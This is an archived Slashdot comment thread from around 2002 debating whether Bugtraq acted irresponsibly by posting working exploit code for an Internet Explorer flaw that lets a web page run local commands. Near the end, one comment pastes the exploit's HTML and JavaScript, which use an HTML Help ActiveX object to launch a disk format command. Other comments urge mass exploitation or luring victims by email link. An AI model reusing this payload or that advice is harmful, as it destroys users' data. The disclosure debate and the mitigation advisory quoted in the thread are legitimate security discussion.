Slashdot Mirror
Controversy Surrounds Huge IE Hole
Suchetha wrote in with a Wired News bit talking about
security hole
in IE that allows malicious web pages to reformat a hard drive. The Wired
talks
more about bugtrack's handling of the whole thing, and how it essentially posted working
code for the exploit. Was it irresponsible or not?
If they cared about preserving security for users, or getting the defect fixed, they'd have given the working code exclusively to the defect owner. Posting working malicious code to the general population serves NO BENEFIT to anyone other than those with malicious intentions. You can properly describe 99.99% of bugs without giving people the tools to take advantage of it.
The Wired talks more about bugtrack's handling of the whole thing, and how it essentially posted working code for the exploit. Was it irresponsible or not?
Easy question to answer.
If Linux had an exploit that allowed someone to ssh into your box, su to root, then fsck your harddrive, and a patch wasn't released yet, would you be pissed off that bugtraq posted the code to exploit the bug?
Don't say "it'll never happen," cause anything is possible.
Good quote, too many chars. Seriously, the slashdot 120 char limit sucks!
thats freakin crazyness.....hmmm wheres that mozilla download site again...
The Wired talks more about bugtrack's handling of the whole thing...
Dude; since when did Lain start writing technical articles?
It might be my sadistic side, but I prefer for working exploits to be posted by the security sites... It gives you a way of checking to see if you are vulnerable.
In the case of M$ bugs, it also puts more pressure on the company to come up with a fix for the problem quickly.
the irresponsibility lies with the company who released IE - with huge holes. once the holes are found, it is then their job to release patches, no?
ok, ok, it's redundant, but someone had to say it again.
The article states that the code wasn't new, and was taken from public forums etc. So I don't really think that this is irresponsible..
Thanks for not posting a link to that page.
http://dtum.livejournal.com
What may be MORE irresponsible is /. posting a link to Wired posting a link to the exploit for all the l33t script kiddies here.
No, wait... there's no script kiddies here. Only hax0rz with K-rad XP boxen.
-- El Sacarino tiene gusto de la chocha
I cannot help but notice that in almost all cases, the security problems in both IE and Mozilla have been in the realm of active content - Javascript, Flash, and ActiveX.
Hence why I as a matter of course disable them.
How about encouraging webmasters and web designers to avoid requiring them unless absolutely necessary?
www.eFax.com are spammers
Ok, so they acknowledge that microsoft has known about the problen since November. But the messenger is still the one that should be shot. And not microsoft since they are "investigating the issue".
...
The article is just stupid
here
http://www.onid.orst.edu/~boyechky/open.html
I would rather have my hard drive formatted. -S
We Apprentice Developers and Designers
Had BugTraq not posted this code then what proof would they have to take to Micro$oft. After all, the people that want to utilize that code are going to be able to find it anyway. In my opinion this merely makes Micro$oft responsible for their product and hopefully will lead to the quicker introduction of a patch. Or, God forbid, it could entice people to use a different web browser.
Memories become legend, Legend fades to myth, and even myth is forgotten by the time that age comes again.-Robert Jordan
[sarcasm]..script kiddies! These 3733t haX0rz need Bugtraq to tell them how to do things, step by step.[/sarcasm]
Of course, if Microsoft was really worried about "Secured Computing" and not "Secured Profits" things like this would never happen.
MunITioN
"A mind is a terrible thing to lose"
Those who think, "We should give MS a couple months to find an appropriate patch" are sadly misguided. Do you think a script kiddie or hacker is going to wait? Do you think they're going to say "Oh, I shouldn't do this because microsoft is a big company." Wake up people, the only way a company is going to put their top programmers on the job to fix the bug is when the threat moves from "possible" to "real". As much as I wish companies too exploits more seriously, the reality is they don't until it is percieved as a "real immediate threat."
I think BugTraq was irresponsible posting working code for the exploit, but I also think the point is academic.
After all, if some script-kiddie wanted to exploit this, they'd just find the working code somewhere else.
I'm too lazy to think of anything to put here.
"The new information enabled me to add to some rudimentary precautions I'd taken previously based on earlier information," said Gary Flynn, a security engineer at James Madison University. "But, of course, it also made it easier for others to take advantage of the situation."
That's very nice for the well informed, but unfortunately,
{people who take rudimentary precautions} is tons smaller than {people who have no idea, and who might get hacked}
I don't see how having the code broadcast to the entire world so that people could make very basic (but non-default) IE settings changes was worth the trade-off of having all the people who don't know enough to take these precautions (read everybody who doesn't follow bug or exploit lists) potentially get hacked.
Comment removed based on user account deletion
Posting as Anon since I don't need the Karma:
n ee ring/issues/ie.shtml#opt
----------
Serious Internet Explorer Defect
This is a developing issue and the information presented here is preliminary in nature and subject to frequent changes. Last significant update - 11/08/02-1830
SUMMARY
A simple way to exploit an unfixed defect in Internet Explorer has been discovered that allows malicious web sites, and possibly malicious email messages read with Outlook or Outlook Express, to take control of a computer. All you would need to do is click a web link and the owner of the web site could take almost any action they desired on your computer.
Simple, working exploit software was recently published to a public mailing list.
There is no patch to fix the problem. Anti-virus and personal firewall software will not prevent an exploit. It is hoped that Microsoft will provide a patch to fix this defect in the near future.
It is impossible to predict how, when, or even if someone will take advantage of this but due to the ease with which bad things can be accomplished it was decided to post an announcement. Nothing at all may happen. Or someone could write a virus or put up a malicious web site to take advantage of the situation at any time. The last time a defect exploit with similar characteristics was published, it was quickly incorporated into many email viruses making it unnecessary to click an attachment to get infected.
The following practices are recommended for users of Internet Explorer, Outlook, and Outlook Express until more information becomes available:
1. Users of Outlook and Outlook Express should perform the following simple, unobtrusive procedure to disable scripts from executing in email messages:
Click the Tools menu item and select Options
Click the Security tab
In Outlook Express, make sure the Virus Protection security zone is set to Restricted site zone as shown in the window below:
In Outlook, make sure the Secure Content Zone is set to Restricted Sites as shown in the window below:
These are the default settings for Outlook 2002 and Outlook Express 6. Users of earlier versions should change the setting to Restricted.
2. Indiscriminate browsing of untrusted or questionable web sites should be avoided or scripting should be disabled as described in the additional security measures below. Note that hyper links sometimes appear in email or instant messages. If these messages are from malicious individuals, they could lead you to a malicious web site.
3. Indiscriminate clicking of hyper links in unexpected or suspect email messages, instant messages, and peer sharing resources should be avoided or scripting should be disabled in Internet Explorer as described in the additional security measures below.
ADDITIONAL SECURITY MEASURES AND INFORMATION
There is only one technical defense against an exploit at the present time and that is to disable scripting in Internet Explorer, Outlook, and Outlook Express. Instructions for disabling scripting in the mail clients were included in the recommendations above and should have little or no effect on day to day use.
Unfortunately, disabling scripting in Internet Explorer will adversely affect the operation of many web sites including E-campus and the Windows Update Site. There is, however, a way to specify trusted web sites that are are allowed to use scripting and disable it for all others. Users desiring to decrease risk may follow the instructions at the following web site under the section titled "Optional Internet Explorer Security Measures":
http://www.jmu.edu/computing/info-security/engi
Risk associated with this exploit and most others can be somewhat reduced by using a non-Administrative Windows account when browsing the web, reading email, and other day to day computer use.
The defect has been verified in Internet Explorer 5.5 and 6 SP1 running on Windows 98 and XP SP1 respectively. It is likely all varieties of 5.5 and 6 are vulnerable. A quick attempt on a Windows 95 computer running IE 5.0 was unsuccessful but not enough research was done to know why.
A possible symptom of an exploit is a Window similar to the one below suddenly appearing on your screen after clicking a hyperlink or opening an email message. The exact appearance of the Window may vary depending upon the version of Internet Explorer and operating system. Note that this window will appear if you click Help and under that circumstance the window appearance is not an indication of an exploit. If you are affiliated with James Madison University and see this window unexpectedly appear after clicking a web hyperlink or reading an email message, please contact Gary Flynn at x82364 ASAP. People affiliated with James Madison University can find my home number in the local directory and are encouraged to call me at home if such an event takes place after normal working hours.
I mean, cmon whats the likelihood tha - C:\>FORMAT C:\ *bbbzzzzzzzt*
oh crap.
"Old man yells at systemd"
Who would have though Microsoft would provide such low level functionality in their browser?
Mozilla probably won't let you format a hard drive.
Just one more shining example of the superiority of closed source....
</sarcasm>
The only huge hole I've seen in IE is at goatse.cx...
-gerbik
is insecure.
Only people who need that information should be allowed to it. That's why only something like bugzilla really works well with a product that is likely to be subject to exploits - only the people who are developers of the relevant piece of code are admitted into the security exploits section.
If that kind of info is posted openly on the web, I fail to see the difference between that and stupid pages that always post activex exploits thinking they're cool hax0rs. Cool hax0rs don't post exploits, they fix them.
Join the elite! Post at score:2! Ghostwheel is online.
The information was already out there.
Would you rather let the "bad guys" have it and not know about it?
The argument against supressing such information just never holds up, because it is the public dissemination of such information that cajoles companies such as Microsoft to publish security fixes.
Even so, Microsoft is still too slow to address security flaws and does an exceedingly poor job of communicating them to the public.
If I don't know what the malicious code is, how am I supposed to avoid it?
Informed security is way better than uninformed security.
Anyone who wants to use this exploit will find out how. The exploit-users already know how to use it and will tell their friends, so we may as well know also.
$8.95/mo web hosting
"Since November"? Today is November 19. The statement "since November" does not give any information, except that MS was informed at most 18 days ago.
Yet another reason to switch to Opera.
I started using Opera 6.05 a few weeks ago, and am quite please with the speed and features. Sure, in like the thousands of web-pages I've surfed, there were like 2 that I couldn't browse, but that's no problem.
If you are looking into Opera, I suggest waiting until version 7 comes out (should be soon). The beta for version 7 looks awesome, but its still pretty buggy. It also comes with an email client that's supposedly pretty good too.
a.) Run Microsoft exclusively (only want to see Microsoft bugs)
b.) Run Microsoft exclusively (don't want to see Microsoft bugs)
c.) Want to find any reason to bash Microsoft... (only want to see Microsoft bugs
d.) Don't run Microsoft at all (don't care about Microsoft bugs)
Now, this may sound on the surface like an M$ slam, however that is not my intention here (as much as I dislike that company).
M$ has shown, in the past, that it is very unresponsive at times to reported security vulnerabilities. Sure, the proper thing to do would be to send the vulnerability details to M$ and have them fix it. The problem is that M$ sometimes sweeps such stuff under the rug: "Oh, no one else knows, so we can put this one off." By posting the code, it is quite possible that M$ will be forced to deal with the issue now. I don't agree with the method taken here, but considering M$'s track recond on this, this may be the only way to get it taken care of quickly.
Be excellent to each other. And... PARTY ON, DUDES!
i think the ultimate entity responsible is the company that makes the flawed program. If there is no bug, there is no code exploiting the bug on a website. the bug exists and can be exploited, whether the code is posted or not.
I'd say it's really no better or worse then, say, Slashdot posting links to warez.
I usually try not to sound insulting, but come on... if you're still using Internet Explorer then you are honestly being stupid.
Try Mozilla or one of its derivitives, my favourite is Phoenix. Another fine piece of software, independant of both IE and Mozilla is Opera.
I know some people will probably moderate me down for this, but I don't care.
Like the title says: I am not surprised. Microsoft probably has the poorest security track record of any software publisher out there.
Maybe Bugtraq has not been very serious in its handling of this security hole, but, honestly using Microsoft operating systems or applications without a ton of additionnal security software (antivirus, firewalls, etc) is asking for trouble.
In my opinion, Bugtraq is not responsible: Microsoft is. If you use Microsoft products, do as I do: do not use IE (I use Opera or Mozilla), do not allow any application to have access to the Internet without authorization (I use Zone Alarm), do not use Outlook for email (I use Pegasus Mail) and install and update an antivirus program religiously (I actually use two).
Two, out of my 4 personal machines at my home, use either Linux or OpenBSD. One is a Windows 98 machine. The last is being rebuilt and will become a NetBSD workstation. And there is a reason for it: Microsoft security (or rather lack of).
Now, flame all you want. =)
The right to offend is far more important than the right not to be offended. (Rowan Atkinson)
Too many companies (software vendors, security consultants) are financially vested in how bad the security blackeye looks in the marketplace and it colors their policies regarding security notification.
As far as I'm concerned, the interests of the software users should be the primary concern.
"Provided by the management for your protection."
BugTraq is a mailing list dedicated to full disclosure. Before I get modded down for being redundant, let me explain how/why this is relevant. In a list dedicated to full disclosure, it becomes up to the person who drafts the advisory to be responsible for it's content. Many companies believe that vendor notification before releases is standard procedure, and yet there are others (ISS) who seem to believe that having one non-vulnerable version (bind 9) means that they can release an advisory that affects other versions that currently have no patches (bind 8, 4).
On the other hand, there are "independents" such as GOBBLES and other security goons who believe that posting the advisory with full exploit code the second they discover it is a good idea. I'm not going to disagree with that, because without such wake-up calls, many people would never update their systems, remaining vulnerable for days/months/years. It's pretty ridiculous how many people do.
It's not really up to BugTraq to decide which is the better course of action, it's up to the analysts and the community. If the community chooses to ostracize a member for using such tactics, they can do so. I'm sure that a commercial security vendor would encounter exactly that for releasing an advisory with exploit code and no vendor notification.
Though, in all fairness, most people have known about this IE exploit for months, and I can be reasonably sure that among "most people" "Microsoft" is included. Microsoft doesn't exactly have the worlds best track record working with people to resolve security issues, or even releasing timely patches.
In short, BugTraq good, security good, black hats bad.
If there is a God, you are an authorized representative. - Kurt Vonnegut Jr.
Certainly, making sure someone is aware of an issue with their software should be paramount before telling others. Alas, big corporations often just don't care, which is a disgrace.
However, whilst there's something to be said for fighting such companies, I fail to see why it should be at the user's expense.
Lots of people use windows. Some like it. Some hate it. Some, like me, have very little choice in the matter - finding a job elsewhere is simply not a realistic option. Now, why should I be punished over a vendetta?
Take a look at the PHP exploits released a few months ago. You were talking total server compromise. Were there any exploits? Certainly, but you would have a damn hard time actually finding them.
Right now, alas, there's a chance that my machine will be erased, losing work that hasn't been backed up because that's what I've done in the mere last few hours.
Think of the users. Please.
What's irresponsible is that MS missed a glaring hole like this in their browser. Does MS even have a QA department? I didn't think so. I fully support someone posting exploit code. All it does is give more reason for people to move to Mozilla and hate IE even more.
Basically this is the same as another exploit posted to the list earlier, but with a new command. And for that matter, jelmer has been posting a new IE local zone exploit like every week... Any of them could have been used to make something like this, it's just no one has tried to do a format. True the jelmer posts didn't include the "run a program with arguments" thing that was posted this week, but they did show how to read/write arbitrary files and execute them. So batch file somewhere and here comes a HD format.
So the only reason we haven't seen this I think is because like always, virus creators want their program to spread, and the quickest way to stop the spread is to kill your host, so instead we get mass mailers, trojans, etc. It was going to happen eventually.
Free Online Woodworking Resources Directory
Maye now they'll stop A. forcing us to use IE and B. giving us Root XP userIDs. I keep kvetching about this but maybe a major hole like this will get their attention. . .
You are not the customer.
I don't think it was irresponsible for the bug to be posted and described in the manner it was. The more clues you give out, the more likely someone will figure it out, and exploit it. It's not like they were writing a proggy for the scriptkiddies.
Better to be out with the whole thing, and put pressure on MicroSoft to fix it, than to be cryptic about it.
Another day, another mack-truck sized hole in an MS product. People sound surprised by this... =P
Julie Moult is an idiot.
i think its hardly irresponsible, i consider it merely posting the redistributable fix to the problem along with the notice that it exists.
members are seeing something, your seeing an ad
My C++ documentation also has code that shows how to format disks. Are THEY irresponsible too? ....the blame should be put where it belongs.....
dan.
Imagine how quick that would wipe on a beowolf cluster running wine - like er wipeeeee
...you are the one irresponsible.
"If you have done 6 impossible things this morning, why not round it off with breakfast at Milliways" -- hhgg
people who want to do malicious things to your computer will find a way, whether or not the exact code is posted to popular web sites. Software companies have the responsibility to publish fixes to bugs, especially in a timely fashion. Microsoft tends to delays patches to their programs.
It has proven time and time again that MS does not care about fixing their bugs or securing their users. Their only concern is furthering their illegal monopoly position by abusing the political system of america.
That leaves us with each other as our ONLY protection. Personally, I WANT to know if users in my network are able to accidentally destory their computers, and I NEED to know how the problem occurs so I can help avoid it. As I already stated, if we can not help each other get past the problems, then malicious programmers will have already won, thats just the MS world. Trusted computing is between users, not with the vendor in these dark times.
this expliot has been around for over a year now. I consider any highlighting to the mass's as responsible given the amount of people who know about it already.
but...(you knew the "but" was coming, right?)
Is it really any more irresponsible than running IE in the first place? How many more of these browser exploits have to happen? A part of me almost hopes someone does exploit this and do nasty things with it JUST SO PEOPLE WON'T BE DEPENDANT ON IE ANYMORE. Friends don't let friends use Internet Explorer.
I think the word needs to be spread: Anyone who uses IE isn't an innocent bystander, but someone who knowingly uses a defective and dangerous product. IE Users are no better than people who own Ford Explorers and kept the old Firestones because they don't want to go through the trouble to get them changed.
So, all you other geeks out there, when you're visiting family over the upcoming holidays and they inevitably ask you to fix something on their computer, install Mozilla (or Opera, or even Netscape) and set it as the default browser. When they ask why, tell them it's because IE is a dangerous and defective product.
Comment removed based on user account deletion
Now all we need is a way to embed an ISO image of a Linux system into the web page and use the same exploit to install an alternative operating system. Just think of the banner ads! "Click here to Install Linux!" and "Get That Windows Monkey Off Your Back! Hit the Monkey to Try!" and "Eliminate Windows Instabilities Forever. Click Now!". Then it won't be malicious. It'll be setting all those people FREE!
Curmudgeon Gamer: Not happy
Malicious code is out there for the taking from any number of sources. It's not a case of finding and identifying malicious code anymore. It's about letting the most people know about it. If they erred it was by not spreading the word broadly enough.
"Consensus" in science is _always_ a political construct.
Since outlook express formats html code that is sent automatically, and I assume uses the saem engine explorer does, could it be possible to send a spam email that will re-format the hard drives on all IE windows systems? scary.
You have to admit, since /. posted a story about it the knowledge of this has skyrocketed.
They do call it the slashdot effect for a reason, you know? Sites only get slashdotted because everyone and his brother goes to take a peek at what the fuss is about.
is why on my computer, IE doesn't even have permission to get through ZoneAlarm
Technoli
Just imagine what would happen if someone combined this hack with the blackops IP techniques discussed in prev /. article... could someone effectively wipe ALL the drives and servers running windows on the net?... do you think people would come down on MS then???
I think, that if this is left unpached, then those in the hacker community almost have a responsibility to fully exploit this... just to force a patch to be released... reformating 2^32 computer systems would get their attention, even if congress cant.
The Code Ninja is swift with his tool, precise in his delivery, and deadly accurate in his execution.
They need to hire on Britney. "Oops, I Did It Again"
seems like the fun just never stops in MS land.
just noticed all my typos. good thing I don't proof read until it's too late :P
For a minute I was worried that google searching wouldn't be safe anymore because there was a real threat of something erasing my hard drive. Then I realized, hey, it's an IE security hole, I can still run Moz in Win and wait until a fix.
The GeekNights podcast is going strong. Listen!
I just tried using the exploit code on my Mac OS X box running Internet Explorer and it didn't work. My hard disk was not formatted. I am disappointed. Why is Microsoft treating Mac users different than Windows users? Its not often that Mac OS X users get to use those nice 'Recovery CDs' that get shipped with Macs. We pay top dollar for our computers, we might as get to use everything that comes with them. Thanks a lot Microsoft! Just for leaving me out, I'm switching to Mozilla where are all the security problems and bugs are cross platform!
Strange women lying in ponds distributing swords is no basis for a system of government.
From the article:
"To disclose or not disclose -- it's a question that's been under heavy discussion in the computer security industry over the past year."
I think it's fair to say this debate has been raging for at least as long as Microsoft has been in existence.
My
Limekiller
Wow, i downloaded mo, i was thinking about switching, and now i've officially decided. In case anyone needs any more coersion, this is your truth serum.
"Martha Stewart can lick my Scrotum......do i have a scrotum?" -- Sharon Osbourne
Is that the one spinning out of control gobbling up dying suns ? Oops! misread that. It's Microsoft, not a black hole (BBC news link) http://news.bbc.co.uk/1/hi/sci/tech/2490075.stm
Funny how this article links to the post made by the person who discovered the exploit and HIS CODE on how to do it. Whos' the responsible reporter now?
I...uh...want to see if they are...are as numerically diverse as mine! Yeah..that's it!
Neither this incident nor the wired story adds anything new to the debate.
It's really gotten quite tiresome. Neither side of the "full-disclosure" flame war will ever convince the other, so I imagine it will continue forever.
Keep in mind that bugtraq was specifically created to be a full-disclosure list. It's a central element of their charter. The moderator is therefore highly motivated not to block something on the grounds that it reveals too much information.
If you think that's irresponsible, there's no need to vent about it here. You can read hundreds of megabytes of archived debate on the subject. I'm quite sure whatever argument you want to present will be in there somewhere.
This isn't even a particularly good example to use, since the exploit was already public.
Lets see.. this exploit combined with a bind exploit equals a huge nuber of "windows updates".
Professor Lirpa, of Lirpa Labs, describe the current shortage as not having much environmental impact. "It should only affect hard drive manufacturers. They consume the free supply in the normal course of manufacture. Then once the new drives are used, the Formatium is released back into the atmosphere in it gaseous form. This is why disk drive enclosures have those little vent holes."
He continued, "Don't ever take a virgin drive, cover the hole and then install an OS. You risk explosion. Particularly if you use a bloated commercial OS. One commercial OS actually renamed itself in an attempt to forestall disaster by reminder. You really should open some windows."
There is some speculation that the upcoming shortage was expected by the drive manufacturers, leading them to reduce the period of warranties they offer on newer products.
All my previous sigs now look like this one, I wish they were permanetly recorded when used.
Did they solve it yet?
If not, then give them a break.
It is November now, did they know this since last November?
What is this, my other machine is reformatting. . . LOL
However, their methods are suspect. There had to be a better way to handle this. Posting the exploit code encourages the use of that code, no matter what the motive for posting the code.
IANAL... But I play one on
So if you're using a Windows box, I've got to assume one of three things is happening:
And, yes, it would be different if this were Linux, or BSD, or even MacOS. All those operating systems come with companies or communities who take security seriously, and they respect their users enough to not foist insecure features on them. You can have the reasonable expectation that running any of those OSes let you worry about security a lot less than running a Windoze variant.
If you had a nice apartment in the middle of New York, and you constantly left the front door unlocked, and then one day somebody walked in stole your stereo, I'd feel bad for you. But, you know, not too bad.
Do domain names matter?
thank gawd I just installed this puppy last night
Now will this exploit work with IE6 or 5.5 running in Wine? Did/can anyone check this?
Also IMHO if the company like Microsoft is irresponsive to security holes in their programs the people that discover those holes have every right to publish them. Then and maybe then the vendor will do something because it is forced to do it.
Is this security hole a feature or a bug.
As long as MS keeps insisting that these gaping security holes are a required feature, it is their fault.
They made a mechanism for running arbitrary code on my computer, and apparently didn't take any reasonable means to ensure the security of that mechanism, it is their fault, they should fix it.
Sure, I can always reach my box at 127.0.0.1
Strange women lying in ponds distributing swords is no basis for a system of government.
In the words of a good friend of mine.. and he probably stole them somewhere else - security through obscurity isn't.
/ Per
Here's some more info... click this link it's ok.. you can trust it... go on.. you know you want to.
Nothing to fear. Just a link.
Has anyone ever cracked a medium or large web site's front page, and instead of defacing it added an exploit such as this? Some pretty popular web sites have been cracked before. If a hard drive formatting script hasn't been put onto a major site yet, is it just a matter of time?
I imagine that it would wreck quite a few computer novices' computers.
And possibly -1 RTFE (Exploit).
The advisory quoted only points out how it is possible to combine already well-known OTHER exploits into a way to run commands with parameters in the local context.
Also, last time I checked, you could not format a hard drive just by typing "Format C:". You also have to type "yes" two or three times, quote the volume label back to the FORMAT program, and a couple of other safeguards. Saying that "Web sides format your harddrive" is sensationalism. Yes, they can run programs on your hard disk. (We've seen these kinds of sploits before. They're bad, yes, but not new.) But can it format your hard drive? Not so.
It should also be noted that the exploit paper points out that the author has discovered another way to achieve the same effect, but that details will not be disclosed until the vendor (MS) has patched the problem.
I don't think it is irresponsible (at least not of the magnitude suggested) to quote others' works and say that the vulnerabilities still exist.
Does anyone know if this is the same bug that was fixed in grc.com's XPdite program? That's described as an XP bug, whereas this is desribed as an IE bug, but there's not enough info to be sure.
There was already working code posted that exploited the vulnerability but did not format your drive. There was no need to add that payload to the exploit. It's like handing out a vaccine that you have modified to have worse side effects than the original disease.
--
E_NOSIG
This is the original code from the bt post, for all you s/k's out there....
/autotest';
) ");;
<html>
<head>
</head>
<script LANGUAGE="JavaScript">
prog = 'command';
args = '/k format a:
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:'
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();c3.Click();")
close();
}
</script>
<body>
<h1>Testi ng IE Execute Exploit</h1>
</body>
</html>
uNF!@#
Someone said MS has known about this for weeks and still there is no fix. MS should have released a fix for this immediately.
Perhaps by giving so much information, MS will get off its lazy rear. There is no excuse for MS not having a fix for this released by end of business today. Anything less is simply inexcusable.
Yes, there is a LOT of work involved here. They need to indentify the problem, find a solution, implement the fix, test the fix, and then release the fix. (with several iterations of implement/test) However, they really should have had people working around the clock on this starting the very minute they found out about it.
Screw virus'..this is perfect...send your victim an email with a link to your exploited page, and boom! And to think this is all possible thanks to M$!
New M$ motto: we fuck up so you have to!
"Some fight for law. Some fight for justice. What will you fight for? One day, you will see."
I'm not sure about the details of the current case, but there is a very good reason for publishing full technical details about an exploit before patches come out. That is that it may be possible in many circumstances for aware and knowledgeable system administrators to prevent the exploit from affecting machines within their control either at a central point, like a firewall or proxy, or by disabling software features until a patch is available.
For example a web proxy might be able to scan for the presence of the malicious code in question, but if that code is not available to the sysadmins, then how can they make appropriate filters? Also being aware of the ways in which these exploits work could allow sysadmins to make more general security policy decisions in terms of what users / processes are allowed to access what areas, etc. I'm not saying that it could be done in this case, but could in many others.
This could save a company a lot of time and money, and is therefore a good thing. It is not true to say that only the party responsible for producing a patch needs to see the actual code for security reasons.
There are a thousand forms of subversion, but few can equal the convenience and immediacy of a cream pie -Noel Godin
Shoot the messenger. Then sue the survivors.
it's your own responsibility to take care of your box. I dont want security through obscurity, so I dont care if someone posts exploits (especially if this helps in diagnosing/resolving the problem for patchers).
In the meantime, I can just avoid the use of that piece of software.
Hey Slashdot, you could have become famous if you'd included the controversial html embedded in the post ;-)
I believe posters are recognized by their sig. So I made one.
Check This Out!
I don't think anyone really has to go freak out quite yet. On an average day I don't visit a whole lot of unknown and untrustworthy websites. The chances of the odd one actually putting the malicious code to use is small. If you see a link the one above - DONT GO TO IT!
Microsoft:"We trust you not to tell anyone about our security holes if you find them"
To hide an exploit doesnt remove it. Damnit, it was there from the first day the software was realesed! Just because script kiddies havent found it doesnt mean its not in the wild. And when someone find out WHERE there is a hole you will have pretty much people poking into that hole to find out how to use it. The vendor must be quicker than the kiddies. Today it seems that no exploit is fixed until somebody scream "blody murder" and releases an exploit.
I think it is because MS wants to keep their official exploit numbers at a minimum. If its not official they just shut up and hopes that no one will discover it.
Dont shoot the messenger.
HTTP/1.1 400
You should be thanking Slashdot for posting a link to that page. There's now one less page for hackers to visit to learn the latest exploits.
- Houdini
but the exploit got to em first
"Some fight for law. Some fight for justice. What will you fight for? One day, you will see."
I can see it now.. Thousands of script kiddies licking their lips over THIS one! Sometimes there's a line between telling and showing...and they didn't just tell..they SHOWED the kiddies how to do it! This is really bad.....
The article is stupid and wrong.
The sploit paper says that MS was contacted about the combined exploit October 4, which is not in November, and that they have closed the issue with a "will not be patched because XYZ" statement, which is not to be investigating the issue.
Two critical wrongs in fact out of two possible. I just felt a sudden urge to trust the rest of the article so much more...
becuase companies like MS liked to deny it. If they denied it on this, then it should be disclosed. Companies such as MS must be held accountable.
I agree that malicious code shouldn't be readily posted without a patch, but sometimes it takes a lot to get a company to make changes. Look at Microsoft, you think they would care about security issues in a program until somebody released malicious code to the public, the company then is forced to patch the program to avoid a bad rep and THEN to avoid problems for their users... just my two cents...
Microsoft is sending some of their people here tonight to give a talk about how cool they are and how fun it would be to work for them (recruitment meeting). I think I'll mention this exploit to them and see what their response is.
The joke they always make is "For those of you who want to work in software testing... Yes, we do test our products (wait for laugh)"
There are only 10 kinds of people in this world... those who understand binary and those who don't
Bugtraq is worth its weight in gold. I am responsible for a bunch of systems. If there is an exploit out there for software I am running I want it to be publicly posted for two reasons.
1. Public posting of exploits puts pressure on vendors/maintainers to fix the problem. It has been demonstrated time and time again that vendors are more worried about making money that supplying secure software. If there is not a clear publically demonstrated threat they are not going to make the updates I need to secure my systems
2. One I want to see it so I can evaluate if my systems are at risk. I am responsible for my network. If the buck stops with me only trust when I can verify. This allows me to sleep well at night.
If they cared at all about security maybe this "Huge IE Hole" would not exist...
Clearly, the code and descriptions for the bug are Windows-only. The question is, does a similar bug (vulnerability to cross-channel scripting attacks) exist in the Mac version? No mention of this on the forums. I would guess not, but I'm using Chimera until the bug is fixed just in case.
PS. To all those people who think MS are evil and that I should be stoned for using Internet Explorer at all: remember that although it lacks tabbed browsing and popup-blocking, Explorer is in most ways superior to Mo and especially to Chimera. The most important difference is that IE runs faster, considering that I'm seeing typing lag as I write this post in Chimera. It's only a couple tenths of a second, but still quite annoying and totally unexcusable on a 700MHz machine. Also remember that IE mac is much better than IE windows for some reason (I've heard Office X is also much better than Office XP, but never tried either).
I hereby place the above post in the public domain.
my company refuses to upgrade from ie 4!!!
hahahahahahahahahah
Can't write a proper post, laughing to hard
hahahahahahahahahahahahhahaha
*cough*
hahahhahahhahahahahah
Microsoft(TM) intrudes^w introduces an incredible new PR nightmare^w^w way to work(TM)!
Trojaned@Home(TM) - work on any problem you want(TM)! Set millions of CPUs working at a moment's notice(TM)! Every copy of Windows(TM) has this glaring security hole(TM)^w^w^w feature(TM) built in!
Trojaned@Home(TM) is super fast, due to Microsoft(TM)'s secret Code Hider^w Layering(TM) technology, which ensures that it's always on(TM), and ready to work for you(TM)!
See the power of the internet(TM) multiplied by millions(TM) of smart Windows(TM) users today!
Use Trojaned@Home(TM)!
Ha! You already are(TM)!
As most people are still running Windoze, we can't just ignore the problem. If this is a real problem then of course I am concerned because I will get a call from my sister or my dad who don't have the money or the time to upgrade.
however if you read it on bugtraq you could easily figure out that it was serious and how to work around it.
A citizens group publically released instructions on how to cheaply and easily produce large quantities of weapons-grade small-pox, anthrax, and ebola. When asked why, the spokestroll for the group replied "We hope that by making this knowledge commonplace, the larger pharmecutical firms will get off their asses and develop effective vaccines and treatment for these diseases, and save the world's population from all biological weapons." He continued, explaining that his next projects were to elect Hillary Rosen as US President to speed the demise of the DCMA, and to airlift 250,000 Scud missles to Iraq to promote Middle East stability.
While I agree with you in principal, and I'm sure we share the bond of 360k floppies with zipped copies of viruses, I have to disagree with the details.
I remember a time when the source code for some vulnerabilities was disclosed, but with errors. If you didn't know how to fix the error, you couldn't use the vulnerability. This way, it was kept OUT of the hands of script kiddies, but put INTO the hands of those with a clue on how to fix the problem.
I'd be willing to bet 95% of the break-ins on the internet are plain old script kiddies. IMHO, there isn't any more port scanning going on, there isn't any more social engineering of the average joe's desktop pc. That sort of work is left to the 'expert' black hats, trying to get into the 'treasure chest'. The rest are lamers just running what they found.
IMHO, if BugTraq is going to post vulns, they need to be non-working, and the user has to have the knowledge to fix them. Especially on closed platforms, it does less good release exploits for code you can't fix, because you're not fixing the problem, you're just working around it.
"I can't give you a brain, so I'll give you a diploma" - The Great Oz (blatently stolen sig)
Found the code, made a web page and verified the exploit with ie5 win200...
Tried it on WINE using CrossOver Office.
and was very disappointed to find that WINE once again did not live up to it goal of being bug for bug compatible with windows.
All i got was HTML help and a script error. No files written to my "C:" and no exploit.
*sigh* Guess WINE still needs some work.
Don't you know that by now? Forcing people to install Linux by tricking them into clicking what they think is just a link is going to smear shit all over Linux's rep and that of its advocates.
I hope to Hell that you were joking.
Running Chimera (Mozilla for OS X). Ho Hum another active X exploit. Now as a sys admin for an all Apple office what do I have to do? Well, I still haven't finished reading the old Andre Norton paperback I found at the used bookstore ...
By posting it to some legitimate high traffic area (like bugtraq) aren't we just encouraging more people to exploit the bug (like anti-MS Linux Zealots)?
I can tell you were born around hackers. Cause in the business world you -need- at least a few weeks AFTER the coded fix is in to test out the new fix and see what other things the fix broke, or other bugs you may have exploited.
This isn't your 1337 world were you just toss out some code and hope everything is keen.
Is this some new security list in the style of Bugtraq, or yet another example of the submitter/slashdot staff not bothering to actually check the facts and spellcheck their stories before being submitted?
...which a friend and I posted to bugtraq. It turned out to be a previously undiscovered variant of the semisoft virus, which we'd dubbed "net.666" for a few reasons (just so you can check my story).
